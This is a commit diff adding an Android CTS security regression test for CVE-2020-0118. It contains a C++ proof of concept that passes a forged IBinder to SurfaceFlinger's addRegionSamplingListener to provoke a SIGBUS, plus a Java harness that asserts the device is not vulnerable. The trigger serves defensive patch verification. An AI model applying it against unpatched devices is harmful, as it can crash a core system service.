diff options
author | TreeHugger Robot <treehugger-gerrit@google.com> | 2022-01-20 00:30:01 +0000 |
---|---|---|
committer | Android (Google) Code Review <android-gerrit@google.com> | 2022-01-20 00:30:01 +0000 |
commit | 565871d50ce41598ac2af314fa785429e9fd69bf (patch) | |
tree | f2a421edbe24e175650c7037b00be168c0bb50d3 | |
parent | 0f96e72d9b3e3c1995531d4e668ba58bfe0b726c (diff) | |
parent | 954449089eb4c2e17e8b3374529aeee520c7ebc6 (diff) | |
download | cts-565871d50ce41598ac2af314fa785429e9fd69bf.tar.gz |
Merge "[RESTRICT AUTOMERGE] CTS test for Android Security b/150904694" into rvc-dev
3 files changed, 205 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp new file mode 100644 index 00000000000..967a0b78c7d --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +package { + default_applicable_licenses: ["Android-Apache-2.0"], +} + +cc_test { + name: "CVE-2020-0118", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + header_libs: [ + "libgui_headers", + "libsurfaceflinger_headers", + ], + shared_libs: [ + "libbinder", + "libgui", + "liblayers_proto", + "libsurfaceflinger", + "libutils", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp new file mode 100644 index 00000000000..b6ce3147128 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp @@ -0,0 +1,124 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +#include "../includes/common.h" +#include "SurfaceFlinger.h" +#include "gui/IRegionSamplingListener.h" + +bool testInProgress = false; + +struct sigaction new_action, old_action; +void sigbus_handler(int signum, siginfo_t *info, void *context) { + if (testInProgress && info->si_signo == SIGBUS) { + (*old_action.sa_sigaction)(signum, info, context); + return; + } + _exit(EXIT_FAILURE); +} + +class NewBinder : public android::IBinder { +public: + constexpr static uint32_t arraySize = 16; + constexpr static uint32_t elementValue = 0x11111111; + uint32_t arr[arraySize] = {}; + + NewBinder() { + for (uint32_t i = 0; i < arraySize; ++i) { + arr[i] = elementValue; + } + } + + const android::String16 &getInterfaceDescriptor() const { + static android::String16 sEmptyDescriptor; + return sEmptyDescriptor; + } + + bool isBinderAlive() const { return true; } + + android::status_t pingBinder() { return android::NO_ERROR; } + + android::status_t + dump(int /* fd */, const android::Vector<android::String16> & /* args */) { + return android::NO_ERROR; + } + + android::status_t transact(uint32_t /* code */, + const android::Parcel & /* data */, + android::Parcel * /* reply */, + uint32_t /* flags */) { + return android::NO_ERROR; + } + + android::status_t linkToDeath( + const android::sp<android::IBinder::DeathRecipient> & /* recipient */, + void * /* cookie */, uint32_t /* flags */) { + return android::NO_ERROR; + } + + android::status_t unlinkToDeath( + const android::wp<android::IBinder::DeathRecipient> & /* recipient */, + void * /* cookie */, uint32_t /* flags */, + android::wp<android::IBinder::DeathRecipient> * /* outRecipient */) { + return android::NO_ERROR; + } + + void attachObject(const void * /* objectID */, void * /* object */, + void * /* cleanupCookie */, + object_cleanup_func /* func */) {} + + void *findObject(const void * /* objectID */) const { return nullptr; } + + void detachObject(const void * /* objectID */) {} + + android::BBinder *localBinder() { return nullptr; } + + android::BpBinder *remoteBinder() { + return reinterpret_cast<android::BpBinder *>(this); + } +}; + +class Listener : public android::BnRegionSamplingListener { +public: + void onSampleCollected(float /* medianLuma */) {} +}; + +int main() { + sigemptyset(&new_action.sa_mask); + new_action.sa_flags = SA_SIGINFO; + new_action.sa_sigaction = sigbus_handler; + sigaction(SIGBUS, &new_action, &old_action); + + android::sp<Listener> listener = new Listener(); + FAIL_CHECK(listener); + + const android::Rect sampleArea{100, 100, 200, 200}; + const android::sp<android::IBinder> &stopLayerHandle = new NewBinder(); + FAIL_CHECK(stopLayerHandle); + + android::sp<android::SurfaceFlinger> flinger = + android::surfaceflinger::createSurfaceFlinger(); + FAIL_CHECK(flinger); + + android::sp<android::ISurfaceComposer> composer = flinger; + testInProgress = true; + android::status_t status = composer->addRegionSamplingListener( + sampleArea, stopLayerHandle, listener); + testInProgress = false; + FAIL_CHECK(status == android::NO_ERROR); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java new file mode 100644 index 00000000000..04c9a05df9f --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AsbSecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.runner.RunWith; +import org.junit.Test; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0118 extends SecurityTestCase { + + /** + * b/150904694 + * Vulnerability Behaviour: SIGBUS in self + */ + @AsbSecurityTest(cveBugId = 150904694) + @Test + public void testPocCVE_2020_0118() throws Exception { + String signals[] = {CrashUtils.SIGBUS}; + String binaryName = "CVE-2020-0118"; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} |